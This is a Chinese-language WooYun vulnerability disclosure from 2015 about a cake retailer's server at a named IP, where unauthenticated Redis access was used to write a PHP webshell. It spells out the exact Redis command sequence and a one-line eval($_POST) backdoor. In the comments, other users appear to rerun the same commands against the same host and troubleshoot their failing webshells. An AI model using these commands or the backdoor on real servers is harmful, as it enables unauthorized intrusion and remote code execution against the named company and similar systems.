漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:廿一客某重要服务器配置不当getshell
提交时间:2015-08-25 17:16
修复时间:2015-08-30 17:18
公开时间:2015-08-30 17:18
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情 披露状态:
2015-08-25: 细节已通知厂商并且等待厂商处理中 2015-08-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: 廿一客某重要服务器配置不当getshell
详细说明: 甘一客的蛋糕看起来真的好精美·正题: http://www.mescake.com/、http://touch.mescake.com/ 沦陷 210.51.166.149服务器getshell redis未授权访问,210.51.166.149
尝试console写shell 1、找网站目录,同一IP上的一域名http://weixin.21cake.com/info.php,找到了网站目录
2、尝试getshell
config set dir /www/we/ config set dbfilename 500.php set hello "<?php @eval($_POST[cc])?>" save
这里格式问题纠结了很久,最后终于上传成功了
漏洞证明: 修复方案: 版权声明:转载请注明来源 爱上襄阳 @乌云
漏洞回应 厂商回应: 危害等级:无影响厂商忽略
忽略时间:2015-08-30 17:18
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态: 暂无
漏洞评价:
评论
2015-09-04 16:38 |
进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)
Connected.210.51.166.149:0>config set dir /www/we/OK210.51.166.149:0>config set dbfilename test.phpOK210.51.166.149:0>set webshell "<?php phpinfo();?>"ERR syntax error210.51.166.149:0>ERR syntax error是为什么?
2015-09-04 16:38 |
进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)
2015-09-05 03:05 |
1937nick ( 实习白帽子 | Rank:97 漏洞数:32 | 水能载舟,亦能煮粥。物尽其用,人尽其能。)
@进击的zjx http://wooyun.org/bugs/wooyun-2010-0133489 这里详细点
2015-09-05 16:00 |
进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)
@1937nick 我也看了一些redis getshell,但我上传phpinfo()可以解析,传一句话就不行,连不上。。这是为什么呢?
2015-09-05 17:40 |
1937nick ( 实习白帽子 | Rank:97 漏洞数:32 | 水能载舟,亦能煮粥。物尽其用,人尽其能。)
@进击的zjx 你的写目录确定没有写错? 有时候数据过大写了也了马也解析不了
2015-09-05 18:50 |
进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)
@1937nick 我就照这个洞主的目录一模一样写的- -!我就写一句话,但是传上去的很多乱码,有两页这样。。不知道为什么